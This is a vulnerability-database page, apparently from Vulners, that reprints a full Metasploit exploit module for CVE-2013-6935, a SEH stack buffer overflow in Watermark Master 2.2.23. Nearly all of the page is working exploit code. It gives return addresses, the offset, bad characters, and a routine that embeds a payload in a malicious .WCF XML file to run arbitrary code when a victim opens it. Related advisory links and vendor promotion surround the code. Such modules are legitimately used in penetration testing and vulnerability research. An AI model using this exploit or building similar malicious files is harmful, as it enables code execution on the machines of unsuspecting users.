Lucene search
K

Watermark Master Buffer Overflow (SEH)

🗓️ 13 Aug 2015 20:26:17Reported by metacom, Andrew SmithType 
metasploit
 metasploit
🔗 www.rapid7.com👁 47 Views

Watermark Master Buffer Overflow in .WCF File Processin

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Watermark Master Buffer Overflow (SEH) Exploit
8 Oct 201500:00
zdt
Circl
CVE-2013-6935
1 Nov 201300:00
circl
Check Point Advisories
VideoCharge Software Watermark Master (CVE-2013-6935)
27 Jun 201600:00
checkpoint_advisories
CVE
CVE-2013-6935
4 Dec 201315:00
cve
Cvelist
CVE-2013-6935
4 Dec 201315:00
cvelist
NVD
CVE-2013-6935
4 Dec 201318:56
nvd
Packet Storm
Watermark Master Buffer Overflow (SEH)
8 Oct 201500:00
packetstorm
Prion
Buffer overflow
4 Dec 201318:56
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'    => 'Watermark Master Buffer Overflow (SEH)',
      'Description'  => %q{
          This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when
          processing a specially crafted .WCF file. This vulnerability could be
          exploited by a remote attacker to execute arbitrary code on the target
          machine by enticing a user of Watermark Master to open a malicious .WCF file.
      },
      'License'    => MSF_LICENSE,
      'Notes' => {
        'Stability' => [],
        'SideEffects' => [],
        'Reliability' => []
      },
      'Author'    =>
        [
          'metacom',  # Original discovery
          'Andrew Smith',  # MSF Module
        ],
      'References'  =>
        [
          [ 'OSVDB', '99226' ],
          [ 'CVE', '2013-6935'],
          [ 'EDB', '29327' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'  => 'win',
      'Payload'  =>
        {
          'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
          'DisableNops' => false,
          'Space' => 7276
        },

      'Targets'    =>
        [
          [ 'Windows 7 x32 - Watermark Master 2.2.23',
            {
              'Ret'     =>  0x10015f2d, #p/p/r | CommonClassesMFC.dll
              'Offset'  =>  516
            }
          ],
          [ 'Windows 7 x64 - Watermark Master 2.2.23',
            {
              'Ret'     =>  0x1001329a, #p/p/r | CommonClassesMFC.dll
              'Offset'  =>  516
            }
          ],
        ],
      'Privileged'  => false,
      'DisclosureDate'  => '2013-11-01',
      'DefaultTarget'  => 0))

    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.wcf']),])

  end

  def exploit

    buffer = rand_text(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded
    buffer << rand_text(18000 - buffer.length)

    file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.2.23.00">
<cols name="Files"/>
<cols name="Profiles">
<Property name="Profile">
<cols name="Watermarks"/>
<cols name="Timelines"/>
<cols name="Streams">
<Property name="Stream">
<Value name="SourcePath" type="8" value="#{buffer}"/>
</Property>
</cols>
<cols name=""/>
</Property>
</cols>
</config>|

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(file)

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Apr 2023 09:27Current
8.1High risk
Vulners AI Score8.1
CVSS 29.3
EPSS0.32351
47